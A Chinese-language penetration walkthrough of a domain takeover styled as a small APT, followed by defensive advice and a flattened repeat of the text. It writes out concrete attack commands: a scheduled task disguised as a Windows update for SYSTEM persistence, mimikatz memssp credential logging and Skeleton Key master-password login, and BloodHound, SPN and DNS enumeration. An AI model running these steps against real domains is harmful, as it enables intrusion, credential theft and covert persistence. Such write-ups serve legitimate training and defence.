一次小型 APT 持久潜伏内网域渗透(上)
字数 1167 2025-08-05 08:19:26

内网域渗透与持久化攻击技术详解

前言

内网渗透的本质是信息搜集。即使拿到域控权限,对于APT攻击来说只是开始,需要长时间了解内网环境,对特定目标进行定向打击。

初始访问与权限提升

  1. 初始立足点获取

    • 通过Web漏洞获取webshell
    • 目标机器无AV防护,可直接使用PowerShell反弹CobaltStrike会话

  2. 信息搜集确认域环境

    • 执行基础命令确认域环境存在

  3. 权限提升

    • 使用MS16-075漏洞提权至SYSTEM权限
    • 创建定时任务保持权限持久化: 
      schtasks /create /RL HIGHEST /F /tn "Windows Server Update" /tr "c:\windows\Temp\Cha\64.exe" /sc DAILY /mo 1 /ST 09:00 /RU SYSTEM

域环境侦察

  1. 识别关键账户与主机

    • 查询域管理员: 
      net group "domain admins" /domain
    • 查询域控制器: 
      net group "domain controllers" /domain
    • 通过ping获取域控IP地址

  2. 敏感信息搜集

    • 翻查机器文件获取账号密码(如MSSQL、门禁系统凭证)
    • 检查GPP组策略共享目录寻找敏感信息
    • 查看共享文件内容

横向移动与域控接管

  1. 令牌窃取技术

    • 识别存在域管进程的机器
    • 注入域管进程获取权限

  2. 建立IPC连接

    net use \\域控IP
    • 验证连接成功后可访问各域控的C盘

  3. 内网扫描

    • 通过代理扫描内网存活主机
    • 使用中继技术让域控上线

权限维持技术

  1. SSP注入

    • 原理:在lsass.exe进程中加载自定义DLL记录登录凭证
    • 实施步骤: 
      mimikatz privilege::debug
mimikatz misc::memssp
    • 查看记录: 
      type C:\Windows\System32\mimilsa.log

  2. Skeleton Key万能密码

    • 原理:在lsass进程中创建万能密码
    • 实施步骤: 
      mimikatz privilege::debug
mimikatz misc::skeleton
    • 使用方式:
      • 以任意域用户身份,使用万能密码"mimikatz"连接域控
      net use \\域控名\c$ /user:"域名\administrator" "mimikatz"

域内信息深度搜集

  1. BloodHound分析

    • 安装Neo4j数据库服务
    • 运行BloodHound收集器SharpHound.exe: 
      SharpHound.exe -c all
    • 导入数据到BloodHound可视化分析

  2. 替代方案

    • 使用csvde导出域信息: 
      csvde -setspn 域名 -f 输出文件.csv
    • 分析SPN服务主体名称: 
      setspn -T 域名 -Q */*

  3. 网络侦察技术

    • nbtscan扫描内网存活主机
    • Metasploit的smb_version模块识别系统版本: 
      use auxiliary/scanner/smb/smb_version
set rhosts 192.168.2.0/24
run
    • DNS记录导出: 
      dnsdump.exe -u 域名\域用户 -p 密码 域控制器名 -r

  4. 网络拓扑分析

    • 查看路由表:route print
    • 检查网络连接:netstat -ano

后续攻击方向

  1. 定向打击准备

    • 根据搜集信息确定特定部门/个人的目标机器
    • 分析各系统版本,如发现大量XP系统可考虑永恒之蓝漏洞

  2. 持久渗透策略

    • 长期潜伏,持续监控目标活动
    • 根据业务时间规律调整攻击节奏

防御建议

  1. 防护措施

    • 及时修补MS16-075等已知漏洞
    • 监控异常进程注入行为
    • 限制域管理员账户使用范围

  2. 检测手段

    • 监控lsass.exe异常行为
    • 审计域控制器上的异常SPN操作
    • 检查异常的计划任务创建

  3. 应急响应

    • 发现入侵后立即重置所有域管理员密码
    • 检查并清理GPP中的敏感信息
    • 审计域信任关系变化

本教学文档详细记录了从初始入侵到域控接管的全过程技术细节,重点突出了权限维持和信息搜集技术,为安全研究人员提供全面的内网渗透视角,同时也可作为防御方加固域环境的参考指南。

内网域渗透与持久化攻击技术详解 前言 内网渗透的本质是信息搜集。即使拿到域控权限,对于APT攻击来说只是开始,需要长时间了解内网环境,对特定目标进行定向打击。 初始访问与权限提升 初始立足点获取 : 通过Web漏洞获取webshell 目标机器无AV防护,可直接使用PowerShell反弹CobaltStrike会话 信息搜集确认域环境 : 执行基础命令确认域环境存在 权限提升 : 使用MS16-075漏洞提权至SYSTEM权限 创建定时任务保持权限持久化: 域环境侦察 识别关键账户与主机 : 查询域管理员: 查询域控制器: 通过ping获取域控IP地址 敏感信息搜集 : 翻查机器文件获取账号密码(如MSSQL、门禁系统凭证) 检查GPP组策略共享目录寻找敏感信息 查看共享文件内容 横向移动与域控接管 令牌窃取技术 : 识别存在域管进程的机器 注入域管进程获取权限 建立IPC连接 : 验证连接成功后可访问各域控的C盘 内网扫描 : 通过代理扫描内网存活主机 使用中继技术让域控上线 权限维持技术 SSP注入 : 原理:在lsass.exe进程中加载自定义DLL记录登录凭证 实施步骤: 查看记录: Skeleton Key万能密码 : 原理:在lsass进程中创建万能密码 实施步骤: 使用方式: 以任意域用户身份,使用万能密码"mimikatz"连接域控 域内信息深度搜集 BloodHound分析 : 安装Neo4j数据库服务 运行BloodHound收集器SharpHound.exe: 导入数据到BloodHound可视化分析 替代方案 : 使用csvde导出域信息: 分析SPN服务主体名称: 网络侦察技术 : nbtscan扫描内网存活主机 Metasploit的smb_ version模块识别系统版本: DNS记录导出: 网络拓扑分析 : 查看路由表: route print 检查网络连接: netstat -ano 后续攻击方向 定向打击准备 : 根据搜集信息确定特定部门/个人的目标机器 分析各系统版本,如发现大量XP系统可考虑永恒之蓝漏洞 持久渗透策略 : 长期潜伏,持续监控目标活动 根据业务时间规律调整攻击节奏 防御建议 防护措施 : 及时修补MS16-075等已知漏洞 监控异常进程注入行为 限制域管理员账户使用范围 检测手段 : 监控lsass.exe异常行为 审计域控制器上的异常SPN操作 检查异常的计划任务创建 应急响应 : 发现入侵后立即重置所有域管理员密码 检查并清理GPP中的敏感信息 审计域信任关系变化 本教学文档详细记录了从初始入侵到域控接管的全过程技术细节,重点突出了权限维持和信息搜集技术,为安全研究人员提供全面的内网渗透视角,同时也可作为防御方加固域环境的参考指南。